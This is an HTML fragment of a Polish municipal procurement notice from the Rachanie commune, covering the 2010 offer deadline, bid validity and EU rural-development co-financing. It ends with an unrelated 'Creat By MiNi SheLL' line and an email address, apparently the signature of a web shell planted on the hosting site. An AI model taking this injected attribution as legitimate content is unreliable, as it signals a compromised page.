<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2010 godzina 11:00, miejsce: Urząd Gminy w Rachaniach
ul. Dolna 1, pokój nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 08.05.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013
Nazwa działania 321: Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com